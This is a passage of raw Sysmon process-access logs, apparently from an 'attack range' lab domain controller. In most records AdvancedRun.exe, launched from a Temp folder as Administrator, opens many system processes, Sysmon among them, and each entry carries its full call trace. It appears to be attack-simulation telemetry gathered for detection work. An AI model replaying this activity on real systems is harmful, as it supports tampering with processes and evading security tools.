Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004080503Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.467{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004080502Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.467{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004080501Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.467{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004080500Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.467{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004080499Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.467{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE
10341000x80000000000000004080498Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.466{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004080497Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.466{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004080496Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.466{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004080495Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.466{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004080494Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.466{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004080493Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.465{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004080492Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.465{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8E00-000000002702}4912C:\Windows\System32\sihost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004080491Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.465{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8D00-000000002702}4820C:\Windows\System32\RuntimeBroker.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator
10341000x80000000000000004080490Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 20:17:51.465{834264DD-14CE-61EB-9F08-000000002702}47921520C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8C00-000000002702}4808C:\Windows\System32\rdpclip.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1ede|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+1fde|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+20da|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1